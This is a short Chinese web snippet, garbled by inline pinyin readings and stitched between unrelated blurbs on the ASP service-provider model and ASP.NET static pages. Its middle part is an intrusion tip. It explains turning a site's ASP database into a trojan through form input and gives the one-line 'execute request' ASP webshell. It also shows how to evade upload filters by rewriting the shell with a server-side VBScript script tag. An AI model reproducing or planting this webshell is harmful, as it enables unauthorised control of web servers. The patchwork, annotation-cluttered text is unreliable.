推薦：國(guó)內(nèi)ASP應(yīng)用，不容樂(lè)觀
新的ASP概念不是指開(kāi)發(fā)工具ASP(ActiveX Server Pages)，而是指應(yīng)用服務(wù)提供商(Application Service Provider)一種新的IT經(jīng)營(yíng)模式。通俗的話，即企業(yè)不購(gòu)買(mǎi)應(yīng)用軟件，而是采用租賃的形式租用軟件

很多時(shí)候我們可以通過(guò)在注冊(cè)表單或者用戶(hù)信息修改表單中，插入簡(jiǎn)短的ASP代碼，使網(wǎng)站ASP數(shù)據(jù)庫(kù)變成為一個(gè)ASP木馬，然后進(jìn)一步入侵控制服務(wù)器。

不過(guò)在上傳代碼過(guò)程中，許多網(wǎng)頁(yè)程序都不允許包含〈%%〉標(biāo)記符號(hào)的內(nèi)容的文件上傳。

這樣就有好多SHELL不能上傳上去了。可以采用下面的方法解決。以藍(lán)屏最小ASP木馬為例。

首先：原程序代碼是：

〈%execute request("l")%〉

我們可以把它的標(biāo)簽換下來(lái)。

然后改成：

<scriptlanguage=VBScript runat=server>execute request("l")</Script>

這樣就避開(kāi)了使用〈%%〉，保存為.ASP,程序同樣執(zhí)行。

分享：Asp.net生成htm靜態(tài)文件的兩種途徑
現(xiàn)在很多網(wǎng)站特別是資訊類(lèi)的都把內(nèi)容生成靜態(tài)頁(yè)（htmhtmlshtml等），這類(lèi)總結(jié)了一下兩種生成靜態(tài)頁(yè)的方法并做了一個(gè)Demo文件供大家下載。 分別是通過(guò)模板（比較常用）和根據(jù)url生成（不到萬(wàn)